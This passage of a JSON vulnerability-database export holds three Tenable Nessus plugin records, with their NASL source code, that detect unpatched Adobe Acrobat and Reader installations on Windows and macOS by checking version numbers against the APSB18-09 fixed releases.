"CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "ADOBE_ACROBAT_APSB18-09.NASL", "href": "https://www.tenable.com/plugins/nessus/109895", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109895);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/04/08 10:48:58\");\n\n script_cve_id(\n \"CVE-2018-4947\",\n \"CVE-2018-4948\",\n \"CVE-2018-4949\",\n \"CVE-2018-4950\",\n \"CVE-2018-4951\",\n \"CVE-2018-4952\",\n \"CVE-2018-4953\",\n \"CVE-2018-4954\",\n \"CVE-2018-4955\",\n \"CVE-2018-4956\",\n \"CVE-2018-4957\",\n \"CVE-2018-4958\",\n \"CVE-2018-4959\",\n \"CVE-2018-4960\",\n \"CVE-2018-4961\",\n \"CVE-2018-4962\",\n \"CVE-2018-4963\",\n \"CVE-2018-4964\",\n \"CVE-2018-4965\",\n \"CVE-2018-4966\",\n \"CVE-2018-4967\",\n \"CVE-2018-4968\",\n \"CVE-2018-4969\",\n \"CVE-2018-4970\",\n \"CVE-2018-4971\",\n \"CVE-2018-4972\",\n \"CVE-2018-4973\",\n \"CVE-2018-4974\",\n \"CVE-2018-4975\",\n \"CVE-2018-4976\",\n \"CVE-2018-4977\",\n \"CVE-2018-4978\",\n \"CVE-2018-4979\",\n \"CVE-2018-4980\",\n \"CVE-2018-4981\",\n \"CVE-2018-4982\",\n \"CVE-2018-4983\",\n \"CVE-2018-4984\",\n \"CVE-2018-4985\",\n \"CVE-2018-4986\",\n \"CVE-2018-4987\",\n \"CVE-2018-4988\",\n \"CVE-2018-4989\",\n \"CVE-2018-4990\",\n \"CVE-2018-4993\",\n \"CVE-2018-4995\",\n \"CVE-2018-4996\",\n \"CVE-2018-12812\",\n \"CVE-2018-12815\"\n );\n script_bugtraq_id(\n 104102,\n 104167,\n 104168,\n 104169,\n 104171,\n 104172,\n 104173,\n 104174,\n 104175,\n 104176,\n 104177\n );\n\n script_name(english:\"Adobe Acrobat < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09)\");\n script_summary(english:\"Checks the version of Adobe Acrobat.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Acrobat installed on the remote Windows host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Acrobat installed on the remote Windows host is a\nversion prior to 2015.006.30418, 2017.011.30080,\nor 2018.011.20040. It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Acrobat 2015.006.30418 / 2017.011.30080\n/ 2018.011.20040 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4947\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_acrobat_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/Adobe Acrobat\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::get_app_info(app:\"Adobe Acrobat\", win_local:TRUE);\nconstraints = [\n { \"min_version\" : \"15.6\", \"max_version\" : \"15.6.30417\", \"fixed_version\" : \"15.6.30418\" },\n { \"min_version\" : \"17.8\", \"max_version\" : \"17.11.30079\", \"fixed_version\" : \"17.11.30080\" },\n { \"min_version\" : \"15.7\", \"max_version\" : \"18.11.20038\", \"fixed_version\" : \"18.11.20040\" }\n];\n# using adobe_reader namespace check_version_and_report to properly detect Continuous vs Classic, \n# and limit ver segments to 3 (18.x.y vs 18.x.y.12345) with max_segs:3\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T03:45:05", "description": "The version of Adobe Reader installed on the remote macOS or Mac OS X\nhost is a version prior to 2015.006.30419, 2017.011.30080,\nor 2018.011.20040. It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 32, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-17T00:00:00", "title": "Adobe Reader < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09) (macOS)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:adobe:acrobat_reader"], "id": "MACOSX_ADOBE_READER_APSB18-09.NASL", "href": "https://www.tenable.com/plugins/nessus/109898", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109898);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\n \"CVE-2018-4947\",\n \"CVE-2018-4948\",\n \"CVE-2018-4949\",\n \"CVE-2018-4950\",\n \"CVE-2018-4951\",\n \"CVE-2018-4952\",\n \"CVE-2018-4953\",\n \"CVE-2018-4954\",\n \"CVE-2018-4955\",\n \"CVE-2018-4956\",\n \"CVE-2018-4957\",\n \"CVE-2018-4958\",\n \"CVE-2018-4959\",\n \"CVE-2018-4960\",\n \"CVE-2018-4961\",\n \"CVE-2018-4962\",\n \"CVE-2018-4963\",\n \"CVE-2018-4964\",\n \"CVE-2018-4965\",\n \"CVE-2018-4966\",\n \"CVE-2018-4967\",\n \"CVE-2018-4968\",\n \"CVE-2018-4969\",\n \"CVE-2018-4970\",\n \"CVE-2018-4971\",\n \"CVE-2018-4972\",\n \"CVE-2018-4973\",\n \"CVE-2018-4974\",\n \"CVE-2018-4975\",\n \"CVE-2018-4976\",\n \"CVE-2018-4977\",\n \"CVE-2018-4978\",\n \"CVE-2018-4979\",\n \"CVE-2018-4980\",\n \"CVE-2018-4981\",\n \"CVE-2018-4982\",\n \"CVE-2018-4983\",\n \"CVE-2018-4984\",\n \"CVE-2018-4985\",\n \"CVE-2018-4986\",\n \"CVE-2018-4987\",\n \"CVE-2018-4988\",\n \"CVE-2018-4989\",\n \"CVE-2018-4990\",\n \"CVE-2018-4993\",\n \"CVE-2018-4995\",\n \"CVE-2018-4996\",\n \"CVE-2018-12812\",\n \"CVE-2018-12815\"\n );\n script_bugtraq_id(\n 104102,\n 104167,\n 104168,\n 104169,\n 104171,\n 104172,\n 104173,\n 104174,\n 104175,\n 104176,\n 104177\n );\n\n script_name(english:\"Adobe Reader < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09) (macOS)\");\n script_summary(english:\"Checks the version of Adobe Reader.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader installed on the remote host is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote macOS or Mac OS X\nhost is a version prior to 2015.006.30419, 2017.011.30080,\nor 2018.011.20040. It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader 2015.006.30418 / 2017.011.30080\n/ 2018.011.20040 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4996\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_reader_installed.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Adobe Reader\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (empty_or_null(os)) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\napp_info = vcf::get_app_info(app:\"Adobe Reader\");\nbase_dir = app_info['path'] - \"/Applications\";\ntrack = get_kb_item(\"MacOSX/Adobe_Reader\"+base_dir+\"/Track\");\n\nif (!empty_or_null(track) && track == '2017')\n{\n constraints = [\n { \"min_version\" : \"17.8\", \"fixed_version\" : \"17.11.30080\" }\n ];\n}\nelse\n{\n constraints = [\n { \"min_version\" : \"15.6\", \"fixed_version\" : \"15.6.30418\" },\n { \"min_version\" : \"18.8\", \"fixed_version\" : \"18.11.20040\" }\n ];\n}\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T03:44:00", "description": "The version of Adobe Acrobat installed on the remote macOS or Mac OS X\nhost is a version prior to 2015.006.30418, 2017.011.30080,\nor 2018.011.20040. It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 31, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-17T00:00:00", "title": "Adobe Acrobat < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09) (macOS)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "MACOSX_ADOBE_ACROBAT_APSB18-09.NASL", "href": "https://www.tenable.com/plugins/nessus/109897", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109897);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/04/22 9:47:13\");\n\n script_cve_id(\n \"CVE-2018-4947\",\n \"CVE-2018-4948\",\n \"CVE-2018-4949\",\n \"CVE-2018-4950\",\n \"CVE-2018-4951\",\n \"CVE-2018-4952\",\n \"CVE-2018-4953\",\n \"CVE-2018-4954\",\n \"CVE-2018-4955\",\n \"CVE-2018-4956\",\n \"CVE-2018-4957\",\n \"CVE-2018-4958\",\n \"CVE-2018-4959\",\n \"CVE-2018-4960\",\n \"CVE-2018-4961\",\n \"CVE-2018-4962\",\n \"CVE-2018-4963\",\n \"CVE-2018-4964\",\n \"CVE-2018-4965\",\n \"CVE-2018-4966\",\n \"CVE-2018-4967\",\n \"CVE-2018-4968\",\n \"CVE-2018-4969\",\n \"CVE-2018-4970\",\n \"CVE-2018-4971\",\n \"CVE-2018-4972\",\n \"CVE-2018-4973\",\n \"CVE-2018-4974\",\n \"CVE-2018-4975\",\n \"CVE-2018-4976\",\n \"CVE-2018-4977\",\n \"CVE-2018-4978\",\n \"CVE-2018-4979\",\n \"CVE-2018-4980\",\n \"CVE-2018-4981\",\n \"CVE-2018-4982\",\n \"CVE-2018-4983\",\n \"CVE-2018-4984\",\n \"CVE-2018-4985\",\n \"CVE-2018-4986\",\n \"CVE-2018-4987\",\n \"CVE-2018-4988\",\n \"CVE-2018-4989\",\n \"CVE-2018-4990\",\n \"CVE-2018-4993\",\n \"CVE-2018-4995\",\n \"CVE-2018-4996\",\n \"CVE-2018-12812\",\n \"CVE-2018-12815\"\n );\n script_bugtraq_id(\n 104102,\n 104167,\n 104168,\n 104169,\n 104171,\n 104172,\n 104173,\n 104174,\n 104175,\n 104176,\n 104177\n );\n\n script_name(english:\"Adobe Acrobat < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09) (macOS)\");\n script_summary(english:\"Checks the version of Adobe Acrobat.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Acrobat installed on the remote host is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Acrobat installed on the remote macOS or Mac OS X\nhost is a version prior to 2015.006.30418, 2017.011.30080,\nor 2018.011.20040. It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Acrobat 2015.006.30418 / 2017.011.30080\n/ 2018.011.20040 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4947\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_acrobat_installed.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Adobe Acrobat\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (empty_or_null(os)) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\napp_info = vcf::get_app_info(app:\"Adobe Acrobat\");\n\n constraints = [\n { \"min_version\" : \"15.6\", \"fixed_version\" : \"15.6.30418\" },\n { \"min_version\" : \"17.8\", \"fixed_version\" : \"17.11.30080\" },\n { \"min_version\" : \"18.8\", \"fixed_version\" : \"18.11.20040\" }\n ];\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}